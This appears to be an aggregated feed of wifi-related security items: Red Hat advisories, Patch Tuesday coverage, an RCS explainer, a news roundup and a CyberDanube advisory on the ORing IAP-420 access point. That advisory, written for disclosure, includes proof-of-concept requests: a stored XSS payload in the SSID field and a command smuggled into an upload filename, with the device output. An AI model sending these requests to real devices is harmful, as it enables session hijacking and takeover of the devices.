Red Hat Security Advisory 2024-3939-03 - An update for linux-firmware is now available for Red Hat Enterprise Linux 7.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3939.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: linux-firmware security update  
Advisory ID:        RHSA-2024:3939-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3939  
Issue date:         2024-06-17  
Revision:           03  
CVE Names:          CVE-2022-27635  
====================================================================

Summary: 

An update for linux-firmware is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The linux-firmware packages contain all of the firmware files that are required by various devices to operate.

Security Fix(es):

* hw: intel: Protection mechanism failure for some Intel(R) PROSet/Wireless WiFi (CVE-2022-46329)

* hw: intel: Improper access control for some Intel(R) PROSet/Wireless WiFi (CVE-2022-27635)

* hw: intel: Improper access control for some Intel(R) PROSet/Wireless WiFi (CVE-2022-40964)

* hw: intel: Improper input validation in some Intel(R) PROSet/Wireless WiFi (CVE-2022-36351)

* hw: intel: Improper input validation in some Intel(R) PROSet/Wireless WiFi (CVE-2022-38076)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-27635

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2238960  
https://bugzilla.redhat.com/show_bug.cgi?id=2238961  
https://bugzilla.redhat.com/show_bug.cgi?id=2238962  
https://bugzilla.redhat.com/show_bug.cgi?id=2238963  
https://bugzilla.redhat.com/show_bug.cgi?id=2238964

Red Hat Security Advisory 2024-3939-03

ASUS has shipped software updates to address a critical security flaw impacting its routers that could be exploited by malicious actors to bypass authentication.
Tracked as CVE-2024-3080, the vulnerability carries a CVSS score of 9.8 out of a maximum of 10.0.
"Certain ASUS router models have authentication bypass vulnerability, allowing unauthenticated remote attackers to log in the device,"

Router Security / Vulnerability

ASUS has shipped software updates to address a critical security flaw impacting its routers that could be exploited by malicious actors to bypass authentication.

Tracked as CVE-2024-3080, the vulnerability carries a CVSS score of 9.8 out of a maximum of 10.0.

"Certain ASUS router models have authentication bypass vulnerability, allowing unauthenticated remote attackers to log in the device," according to a description of the flaw shared by the Taiwan Computer Emergency Response Team / Coordination Center (TWCERT/CC).

Also patched by the Taiwanese company is a high-severity buffer overflow flaw tracked as CVE-2024-3079 (CVSS score: 7.2) that could be weaponized by remote attackers with administrative privileges to execute arbitrary commands on the device.

In a hypothetical attack scenario, a bad actor could fashion CVE-2024-3080 and CVE-2024-3079 into an exploit chain in order to sidestep authentication and execute malicious code on susceptible devices.

Both the shortcomings impact the following products -

*   ZenWiFi XT8 version 3.0.0.4.388\_24609 and earlier (Fixed in 3.0.0.4.388\_24621)
*   ZenWiFi XT8 version V2 3.0.0.4.388\_24609 and earlier (Fixed in 3.0.0.4.388\_24621)
*   RT-AX88U version 3.0.0.4.388\_24198 and earlier (Fixed in 3.0.0.4.388\_24209)
*   RT-AX58U version 3.0.0.4.388\_23925 and earlier (Fixed in 3.0.0.4.388\_24762)
*   RT-AX57 version 3.0.0.4.386\_52294 and earlier (Fixed in 3.0.0.4.386\_52303)
*   RT-AC86U version 3.0.0.4.386\_51915 and earlier (Fixed in 3.0.0.4.386\_51925)
*   RT-AC68U version 3.0.0.4.386\_51668 and earlier (Fixed in 3.0.0.4.386\_51685)

Earlier this January, ASUS patched another critical vulnerability tracked as (CVE-2024-3912, CVSS score: 9.8) that could permit an unauthenticated remote attacker to upload arbitrary files and execute system commands on the device.

Users of affected routers are advised to update to the latest version to secure against potential threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

ASUS Patches Critical Authentication Bypass Flaw in Multiple Router Models

The messaging standard promises better security and cooler features than plain old SMS. Android has had it for years, but now iPhones are getting it too.

If you've been keeping up with all the news out of WWDC 2024 this week, you'll know that Apple is bringing the RCS (Rich Communication Services) messaging standard to iPhones later this year with iOS 18. That's a win for Google, which has long backed RCS on Android. But what actually is RCS? And why does supporting it matter?

The short version: It's an upgrade on the standard SMS/MMS texting standards that smartphones have been using from the start. It brings better support for all the cool features we're used to in our messaging apps, like read receipts and images, and it adds some extra security layers too.

Yes, it's a lot like using iMessage from Apple, or using WhatsApp—though it's not quite that simple. There's no RCS app you can install, but you can find apps that support the RCS standard, as we'll explain.

RCS is coming to iOS this year.

Courtesy of Apple

So the long version: Rich Communication Services is a fundamental standard rather than an app like WhatsApp, Signal, or Telegram. It requires carrier support to work, which is why adoption was slow in the beginning, though RCS now works across most countries and is supported by AT&T, Verizon, and T-Mobile.

SMS (Short Message Service) and MMS (Multimedia Messaging Service) weren't really built for the modern way that we communicate through our phones, and RCS tries to fix that. It adds or improves support for sharing large-resolution images and video, group chatting, read receipts, video calls, and messages that actually go beyond 160 characters.

When RCS is supported in your phone's default texting app, you can add reactions to messages, see when someone else is typing, and drop extra elements like GIFs, stickers, and your current location into conversations—all features you may well be used to and accept as standard in other apps.

There are changes and upgrades behind the scenes as well. Whereas SMS/MMS requires a data connection to your cellular network, RCS works over cell networks as well as Wi-Fi. If you don't have a cell signal for whatever reason but you can find a wireless network, your message can still go through.

RCS settings on a Pixel phone.

Courtesy of David Nield

The standard also brings end-to-end encryption with it. It means that no one else—not even Google or your carrier—can see the conversation that's taking place, because only the devices involved in the conversation have the keys necessary to decrypt it. End-to-end encryption is a security feature you should look for in any app that handles sensitive information, including communications.

It's a clear upgrade, which is why Google Messages and Samsung Messages now support it—the messaging apps you'll find on Pixel phones and Galaxy phones, respectively. In November 2023, Apple finally relented and agreed to support RCS on the iPhone in 2024, though this course correction perhaps had more to do with concerns about antitrust procedures than any newfound sense of camaraderie with Google.

Now we know that iPhone RCS support is going to arrive in September with iOS 18. This means all of those features we've mentioned—from read receipts to message reactions—will work inside the iOS Messages app. However, Android users are still going to show up as green bubbles, as the RCS standard isn't going to be fully integrated with the iMessage platform that Apple operates.

When you're texting someone with RCS enabled, you'll see "Text Message RCS" inside the text input box in Messages on iOS, indicating that the recipient can take advantage of all the modern messaging features that we're now used to. There's no need to turn RCS on or off—it's automatically enabled if you're chatting with a contact who has a device that supports RCS.

How RCS messages will look on an iPhone.

Courtesy of Apple

With iOS 18 still in its development stage, there might be changes to come for how RCS is handled on iPhones before the software is rolled out to all compatible devices later in the year. This version of iOS will work on any iPhone models launched in 2018 or later, so most Apple handsets currently in use will get the software and RCS.

It's the same with Samsung Messages: RCS is simply enabled when available. It's Google Messages for Android that gives you most control over RCS settings, and you can get to them from inside the app by tapping your profile picture (top right), then selecting **Messages settings**. Choose **RCS chats** and you're able to turn features such as read receipts and typing indicators on or off.

With RCS soon to appear on iPhones and now extensively supported on Android devices, it's going to become less and less likely that your phone will need to revert back to SMS—though it will do this if RCS isn't available for whatever reason. Otherwise, the standard that has powered our text messages since 1992 will finally be able to enjoy a well-earned retirement.

A Guide to RCS, Why Apple’s Adopting It, and How It Makes Texting Better

Red Hat Security Advisory 2024-3859-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3859.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: kernel security updateAdvisory ID:        RHSA-2024:3859-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3859Issue date:         2024-06-12Revision:           03CVE Names:          CVE-2023-4155====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: KVM: SEV-ES / SEV-SNP VMGEXIT double fetch vulnerability (CVE-2023-4155)* kernel: bluetooth: bt_sock_ioctl race condition leads to use-after-free in bt_sock_recvmsg (CVE-2023-51779)* kernel: wifi: mac80211: fix potential key use-after-free (CVE-2023-52530)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4155References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2213802https://bugzilla.redhat.com/show_bug.cgi?id=2256822https://bugzilla.redhat.com/show_bug.cgi?id=2267787

Red Hat Security Advisory 2024-3859-03

Microsoft today released updates to fix more than 50 security vulnerabilities in Windows and related software, a relatively light Patch Tuesday this month for Windows administrators. The software giant also responded to a torrent of negative feedback on a new feature of Redmond's flagship operating system that constantly takes screenshots of whatever users are doing on their computers, saying the feature would no longer be enabled by default.

**Microsoft** today released updates to fix more than 50 security vulnerabilities in **Windows** and related software, a relatively light Patch Tuesday this month for Windows users. The software giant also responded to a torrent of negative feedback on a new feature of Redmond’s flagship operating system that constantly takes screenshots of whatever users are doing on their computers, saying the feature would no longer be enabled by default.

Last month, Microsoft debuted **Copilot+ PCs**, an AI-enabled version of Windows. Copilot+ ships with a feature nobody asked for that Redmond has aptly dubbed **Recall**, which constantly takes screenshots of what the user is doing on their PC. Security experts roundly trashed Recall as a fancy keylogger, noting that it would be a gold mine of information for attackers if the user’s PC was compromised with malware.

Microsoft countered that Recall snapshots never leave the user’s system, and that even if attackers managed to hack a Copilot+ PC they would not be able to exfiltrate on-device Recall data. But that claim rang hollow after former Microsoft threat analyst **Kevin Beaumont** detailed on his blog how any user on the system (even a non-administrator) can export Recall data, which is just stored in an SQLite database locally.

“I’m not being hyperbolic when I say this is the dumbest cybersecurity move in a decade,” Beaumont said on Mastodon.

In a recent Risky Business podcast, host **Patrick Gray** noted that the screenshots created and indexed by Recall would be a boon to any attacker who suddenly finds himself in an unfamiliar environment.

“The first thing you want to do when you get on a machine if you’re up to no good is to figure out how someone did their job,” Gray said. “We saw that in the case of the SWIFT attacks against central banks years ago. Attackers had to do screen recordings to figure out how transfers work. And this could speed up that sort of discovery process.”

Responding to the withering criticism of Recall, Microsoft said last week that it will no longer be enabled by default on Copilot+ PCs.

Only one of the patches released today — CVE-2004-30080 — earned Microsoft’s most urgent “critical” rating, meaning malware or malcontents could exploit the vulnerability to remotely seize control over a user’s system, without any user interaction.

CVE-2024-30080 is a flaw in the **Microsoft Message Queuing** (MSMQ) service that can allow attackers to execute code of their choosing. Microsoft says exploitation of this weakness is likely, enough to encourage users to disable the vulnerable component if updating isn’t possible in the short run. CVE-2024-30080 has been assigned a CVSS vulnerability score of 9.8 (10 is the worst).

**Kevin Breen**, senior director of threat research at **Immersive Labs**, said a saving grace is that MSMQ is not a default service on Windows.

“A Shodan search for MSMQ reveals there are a few thousand potentially internet-facing MSSQ servers that could be vulnerable to zero-day attacks if not patched quickly,” Breen said.

CVE-2024-30078 is a remote code execution weakness in the **Windows WiFi Driver**, which also has a CVSS score of 9.8. According to Microsoft, an unauthenticated attacker could exploit this bug by sending a malicious data packet to anyone else on the same network — meaning this flaw assumes the attacker has access to the local network.

Microsoft also fixed a number of serious security issues with its **Office** applications, including at least two remote-code execution flaws, said **Adam Barnett**, lead software engineer at **Rapid7**.

“CVE-2024-30101 is a vulnerability in **Outlook**; although the Preview Pane is a vector, the user must subsequently perform unspecified specific actions to trigger the vulnerability and the attacker must win a race condition,” Barnett said. “CVE-2024-30104 does not have the Preview Pane as a vector, but nevertheless ends up with a slightly higher CVSS base score of 7.8, since exploitation relies solely on the user opening a malicious file.”

Separately, Adobe released security updates for **Acrobat**, **ColdFusion**, and **Photoshop**, among others.

As usual, the SANS Internet Storm Center has the skinny on the individual patches released today, indexed by severity, exploitability and urgency. Windows admins should also keep an eye on AskWoody.com, which often publishes early reports of any Windows patches gone awry.

Patch Tuesday, June 2024 “Recall” Edition

The lone critical security issue is a remote code execution vulnerability due to a use-after-free issue in the HTTP handling function of Microsoft Message Queuing.

Tuesday, June 11, 2024 13:46

Microsoft released its monthly security update Tuesday, disclosing 49 vulnerabilities across its suite of products and software.  

Of those there is only one critical vulnerability. Every other security issues disclosed this month is considered "important."

The lone critical security issue is CVE-2024-30080, a remote code execution vulnerability due to a use-after-free (UAF) issue in the HTTP handling function of Microsoft Message Queuing (MSMQ) messages.  

An adversary can send a specially crafted malicious MSMQ packet to an MSMQ server, potentially allowing them to perform remote code execution on the server side. Microsoft considers this vulnerability “more likely” to be exploited. 

There is also a remote code execution vulnerability in Microsoft Outlook, CVE-2024-30103. By successfully exploiting this vulnerability, an adversary can bypass Outlook registry block lists and enable the creation of malicious DLL (Dynamic Link Library) files. However, the adversary must be authenticated using valid Microsoft Exchange user credentials. Microsoft has also mentioned that the Outlook application Preview Pane is an attack vector. 

The company also disclosed a high-severity elevation of privilege vulnerability in Azure Monitor agent (CVE-2024-35254). An unauthenticated adversary with read access permissions can exploit this vulnerability by performing arbitrary file and folder deletion on a host where the Azure Monitor Agent is installed. However, this vulnerability does not disclose confidential information, but it could allow the adversary to delete data that could result in a denial of service. 

CVE-2024-30077, a high-severity remote code execution vulnerability in Microsoft OLE (Object Linking and Embedding), could also be triggered if an adversary tricks an authenticated user into attempting to connect to a malicious SQL server database via a connection driver (OLE DB or OLEDB). This could result in the database returning malicious data that could cause arbitrary code execution on the client.  

The Windows Wi-Fi driver also contains a high-severity remote code execution vulnerability, CVE-2024-30078. An adversary can exploit this vulnerability by sending a malicious networking packet to an adjacent system employing a Wi-Fi networking adapter, which could enable remote code execution. However, to exploit this vulnerability, an adversary must be near the target system to send and receive radio transmissions.  

CVE-2024-30063 and CVE-2024-30064 are high-severity elevation of privilege vulnerabilities in the Windows Distributed File System (DFS). An adversary who successfully exploits these vulnerabilities could gain elevated privileges through a vulnerable DFS client, allowing the adversary to locally execute arbitrary code in the kernel. However, an adversary must be locally authenticated to exploit these vulnerabilities by running a specially crafted application.  

Talos would also like to highlight a few more high-severity elevation of privilege vulnerabilities that Microsoft considers are “more likely” to be exploited. 

CVE-2024-30068, an elevation of privilege vulnerabilities in the Windows kernel, exists that could allow an adversary to gain SYSTEM-level privileges. By exploiting this vulnerability from a low-privilege AppContainer, an adversary can elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment. However, the adversary should first login to the system and then run a specially crafted application that could exploit the vulnerability and take control of an affected system.  

There are three high-severity elevation of privilege vulnerabilities — CVE-2024-30082, CVE-2024-30087 and CVE-2024-30091 — in Win32K kernel drivers that exist because of an out-of-bounds (OOB) issue. An adversary who exploits CVE-2024-30082 could gain SYSTEM privileges and exploiting CVE-2024-30087 and CVE-2024-30091, would gain the rights of the user that is running the affected application. Microsoft considers these vulnerabilities “more likely” to be exploited. 

CVE-2024-30088 and CVE-2024-30099 are two high-severity, and more “likely exploitable” elevation of privilege vulnerabilities in NT kernel drivers. Successful exploitation of these vulnerabilities would provide the local user and SYSTEM privileges to an adversary, respectively.  

Mskssrv, a Microsoft Streaming Service kernel driver, also contains two elevation of privilege vulnerabilities: CVE-2024-30089 and CVE-2024-30090. An adversary successfully exploiting these vulnerabilities could gain SYSTEM privileges.   

CVE-2024-30084 and CVE-2024-35250 are two more likely exploitable, high-severity elevation of privilege vulnerabilities in the Windows Kernel-Mode driver. An adversary could gain SYSTEM privileges by successfully exploiting these vulnerabilities. However, they must first win a race condition. 

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.  

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their rule set by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63581 - 63591, 63596 and 63597. There are also Snort 3 pre-processor rules 300937 - 300940.

Only one critical issue disclosed as part of Microsoft Patch Tuesday

**According to the CVSS metric, the attack vector is adjacent (AV:A). What does that mean for this vulnerability?**

Exploiting this vulnerability requires an attacker to be within proximity of the target system to send and receive radio transmissions.

CVE-2024-30078: Windows Wi-Fi Driver Remote Code Execution Vulnerability

Plus: A media executive is charged in an alleged money-laundering scheme, a ransomware attack disrupts care at London hospitals, and Google’s former CEO has a secretive drone project up his sleeve.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

At Apple’s Worldwide Developer Conference next week, the company will reportedly announce its own stand-alone password manager that will compete with apps like 1Password and LastPass. Dubbed simply Passwords, according to Bloomberg News, the app will reportedly have features that go well beyond the iCloud or Mac Keychain tools Apple already offers, allowing users to save passwords for Wi-Fi networks, store passkeys, and organize login credentials into categories. Passwords will also reportedly work on Windows machines, but it’s unclear whether people who use Android devices can get in on the security tool.

**Epoch Times Executive Charged With Money Laundering**

US prosecutors on Monday charged an executive at The Epoch Times newspaper with carrying out a massive money-laundering scheme. According to the US Department of Justice, Epoch Times chief financial officer Weidong “Bill” Guan engaged in “a transnational scheme to launder at least approximately $67 million of illegally obtained funds to benefit himself and the media company.”

The scheme, according to the indictment against Guan, largely involved using cryptocurrency to purchase prepaid debit cards “loaded with US dollars that had been obtained through various frauds”—including funds obtained through unemployment benefits fraud—for less than the funds on the prepaid debit cards. The purchase of the cards was carried out by members of The Epoch Times’ “Make Money Online” team, which Guan managed, according to the DOJ. The so-called MMO team would allegedly then use “stolen personal identification information” to open various accounts, which were used to transfer money from the prepaid debit cards to bank accounts associated with The Epoch Times and its employees. Guan faces one count of conspiring to commit money laundering, two counts of bank fraud, and could face decades in prison if convicted.

**Eric Schmidt Ramps Up His Secret AI Military Drone Business**

Google’s former CEO, billionaire Eric Schmidt, is quietly building a military drone company, reports Forbes. The company, called White Stork, has been testing devices at both its Hillspire office complex in Menlo Park, California, and in Ukraine. Relatively little has been publicly revealed about the company or the specifics of its technology. According to Forbes, however, “individuals flying small drones” have been spotted near the Hillspire property, and Schmidt has reportedly hired alumni from Google, SpaceX, and Apple to carry out his secretive project, providing some clues about its ambitions.

**Russian Cybercriminals Blamed for London Health Care Ransomware Attack**

A cyberattack against an organization that facilitates blood transfusions and other sensitive medical care disrupted hospitals and other health care entities across London this week. The attack targeted Synnovis, which manages a partnership between King’s College Hospitals trust and Guy’s and St Thomas’ hospital trust, and Synlab, a European medical testing firm. In a statement published on Tuesday, Synnovis said the attack “has affected all Synnovis IT systems, resulting in interruptions to many of our pathology services.” This forced hospitals to cancel surgeries involving blood transfusions and other procedures. Ciaran Martin, a former top UK cybersecurity official, blamed the attack on Qilin, a cybercriminal gang believed to have ties to Russia.

Apple Is Coming for Your Password Manager

Announcing the latest version of Malwarebytes, which brings a faster, responsive, and consistent user interface, integrated security and privacy, and expert guidance to keep you secure.

Announcing the latest version of Malwarebytes, which brings a faster, responsive, and consistent user interface, integrated security and privacy, and expert guidance to keep you secure.

Here’s what you can expect:

****1\. Unified user experience across platforms** **

The new generation of Malwarebytes now delivers a consistent user experience across all our desktop and mobile platforms. The reimagined user interface is faster, more responsive, and managed through an intuitive dashboard, giving you a streamlined experience wherever you use Malwarebytes. 

**Why?** Sophisticated hacking tactics and various entry points mean you can’t afford to have blind spots in your protection. A seamless experience across all platforms and devices means you don’t have to figure out more than once about what to do next. We’ve also made it easier to find everything, encouraging you to keep your guard up on all your devices. 

****2\. Premium Security and Privacy VPN integration** **

We’ve merged our award-winning Premium Security and ultra fast no-log Privacy VPN into a single dashboard, making it much easier for you to take control of your privacy. With just one click, you can now protect your Wi-Fi or hotspot connections and change your location to visit the site you want at the speed you need. Don’t forget to also use Browser Guard on your desktop to block ad trackers and scam sites from your browser.  

**Why?** We know that the distinction between security and privacy is not clear-cut, and you need both products to work together to minimize your exposure (risk of threats and lack of privacy). Integrating the two makes it much easier to protect both your devices and data (at home and on the go), with an easy set-and-forget experience that doesn’t require adding another program.  You shouldn’t have to guess whether the next attack will compromise your Wi-Fi connection, browser, or files through phishing emails, spyware, or malware. Let the technology do this for you.  

****3\. Trusted Advisor, your security coach**  **

On the Malwarebytes dashboard, Trusted Advisor provides unbiased expert guidance at your fingertips. Your easy-to-understand individual Protection Score enables you to act on any potential security gaps, unlocking the full power of technology.

**Why?** In our recent report, “Everyone’s afraid of the internet, and no one’s sure what to do about it,” we found that only half of the people surveyed felt confident they knew how to stay safe online, and even fewer said they were taking the right measures to protect themselves. Trusted Advisor empowers you with real-time insights, an easy-to-read protection score, and expert guidance that puts you in control of your security and privacy.  We’re by your side guiding you through what to do next to fill your security gaps for each device and platform (Windows, Mac, Android, and iOS).

**Want to try?** You can! With our 14-day free trial.  

Already a customer but not yet seeing it? Log into MyAccount or download the latest build for Windows | Mac | iOS | Android.  

**Software Requirements:** 

*   Windows 7 (or higher) 
*   macOS 11 BigSur (or higher)
*   iOS 16 (or higher) 
*   Android 9 (or higher)

 Say hello to the fifth generation of Malwarebytes 

ORing IAP-420 version 2.01e suffers from remote command injection and persistent cross site scripting vulnerabilities.

    CyberDanube Security Research 20240528-0-------------------------------------------------------------------------------                title| Multiple Vulnerabilities              product| ORing IAP-420   vulnerable version| 2.01e        fixed version| -           CVE number| CVE-2024-5410, CVE-2024-5411               impact| High             homepage| https://oringnet.com/                found| 2024-01-19                   by| T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Founded in 2005, ORing specializes in developing innovative own-brandedproducts for industrial settings. Over the years, ORing has accumulatedabundant experience in wired and wireless network communications industry. Inline with the commercialization of 5G, ORing has stretched its arm into theIIoT field, helping customers realize all kinds of IIoT applications such assmart manufacturing, smart city, and industrial automation. With high productquality and best customer services in mind, ORing has continued to launchcutting-edge products catering to customer needs. ORing's products have beenwidely adopted in surveillance, rail transport, industrial automation, powersubstations, renewable energy, and marine industries with offices worldwide toaddress customer needs in real time."Source: https://oringnet.com/en/about-us/company-profileVulnerable versions-------------------------------------------------------------------------------IAP-420 / 2.01eVulnerability overview-------------------------------------------------------------------------------1) Stored Cross-Site Scripting (CVE-2024-5410)A Stored Cross-Site Scripting vulnerability was identified in the web interfaceof the device. The SSID of the WiFi can be configured to contain arbitraryJavaScript code. An attacker can exploit this vulnerability by luring a victimto visit a malicious website. Furthermore, it is possible to hijack the sessionof the attacked user.2) Authenticated Command Injection (CVE-2024-5411)The filename parameter of the config file upload is prone to a CommandInjection vulnerability. This vulnerability can only be exploited if a user isauthenticated to the web interface. This way, an attacker can invoke commandsand is able to get full control over the whole device.Proof of Concept-------------------------------------------------------------------------------1) Stored Cross-Site Scripting (CVE-2024-5410)Stored Cross-Site Scripting can be triggered by placing JavaScript code intothe SSID input field of the web interface as authenticated user. A singlerequest for injecting the script is shown below:-------------------------------------------------------------------------------POST /cgi-bin/wl_set.cgi HTTP/1.1Host: 192.168.0.1Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 659Connection: keep-aliveCookie: auth=YWRtaW46YWRtaW4=Upgrade-Insecure-Requests: 1sel_op_mode=client&sel_mssid=0&tf_ssid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sel_isolation=0&sel_mssid_isolation=0&sel_auth_mode=0&rb_wep_authmode=0&sel_wep_enc_bits=0&sel_wep_key_type=0&tf_key1=&tf_key2=&tf_key3=&tf_key4=&rb_wpapsk_authmode=0&rb_wpapsk_enc=0&tf_wpa_key=&rb_wpa_authmode=0&rb_wpa_enc=0&tf_ip1=&tf_ip2=&tf_ip3=&tf_ip4=&tf_radius_port=&tf_radius_key=&tf_ip1_1x=&tf_ip2_1x=&tf_ip3_1x=&tf_ip4_1x=&tf_radius_port_1x=&tf_radius_key_1x=&bt_save=Save&lang=en&channel=0&isolation=0&mssid_isolation=0&auth_mode=0&wep_authmode=0&wpapsk_authmode=0&wpa_authmode=0&wpa_enc_type=0&wep_enc_bits=0&wep_key_type=0&wep_key_index=0&ret_msg=-------------------------------------------------------------------------------2) Authenticated Command Injection (CVE-2024-5411)A command can be injected in the filename of the uploaded config. By sending arequest as shown below, the content of the current directory can be shown:-------------------------------------------------------------------------------POST /cgi-bin/admin_config.cgi?todo=upconf HTTP/1.1Host: 10.69.10.2User-Agent: Mozilla/5.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------347087158737672164432057801583Content-Length: 563Connection: keep-aliveCookie: auth=YWRtaW46YWRtaW4=Upgrade-Insecure-Requests: 1-----------------------------347087158737672164432057801583Content-Disposition: form-data; name="upfile"; filename="test.bin;ls${IFS}-la;"-----------------------------347087158737672164432057801583Content-Disposition: form-data; name="bt_upconf"Upload-----------------------------347087158737672164432057801583Content-Disposition: form-data; name="lang"en-----------------------------347087158737672164432057801583Content-Disposition: form-data; name="ret_msg_upconf"-----------------------------347087158737672164432057801583---------------------------------------------------------------------------------This request is equal to executing "ls -la" on the console of the device.-------------------------------------------------------------------------------HTTP/1.0 200 OKtar: can't open '/tmp/test.bin': No such file or directorydrwxr-xr-x    4 root     root         1024 Mar  7 14:36 .drwxr-xr-x    8 root     root         1024 Jan 30  2024 ..-rwxr-xr-x    1 root     root        17572 Jan 30  2024 admin_config.cgi-rwxr-xr-x    1 root     root        17584 Jan 30  2024 admin_default.cgi-rwxr-xr-x    1 root     root        15984 Jan 30  2024 admin_fwup.cgi-rwxr-xr-x    1 root     root        12476 Jan 30  2024 admin_password.cgi-rwxr-xr-x    1 root     root        13164 Jan 30  2024 admin_restart.cgi-rwxr-xr-x    1 root     root        33336 Jan 30  2024 adv_filters.cgi-rwxr-xr-x    1 root     root        15032 Jan 30  2024 adv_misc.cgi-rwxr-xr-x    1 root     root        72168 Jan 30  2024 adv_rstp.cgi-rwxr-xr-x    1 root     root         6588 Jan 30  2024 backup_unit.cgi[...]-------------------------------------------------------------------------------The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------NoneWorkaround-------------------------------------------------------------------------------NoneRecommendation-------------------------------------------------------------------------------CyberDanube recommends Oring customers to upgrade the firmware to the latestversion available and to restrict network access to the management interface ofthe device.Contact Timeline-------------------------------------------------------------------------------2024-02-06: Contacting ORing via support@oringnet.com. Automatic holiday reply.2024-02-19: Asking for an update. No reply.2024-02-28: Asking for an update. No reply.2024-03-11: Searched for "cyber security manager" on LinkedIn. Contacted him            and got the answer, that the content should be sent to            "support@oringnet.com". Sent the advisory to this address directly.2024-03-20: Asking for an update. No reply.2024-04-10: Asking for an update. No reply.2024-04-30: Including support_us@oringnet.com. Asking for an update. Added            notification about responsible disclosure deadline. No reply.2024-05-02: Including support_eu@oringnet.com. Asking for an update. Added            notification about responsible disclosure deadline. No reply.2024-05-27: Sent information that the advisory will be published on 2024-05-28.2024-05-28: Public release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF T. Weber / @2024

Tag

#wifi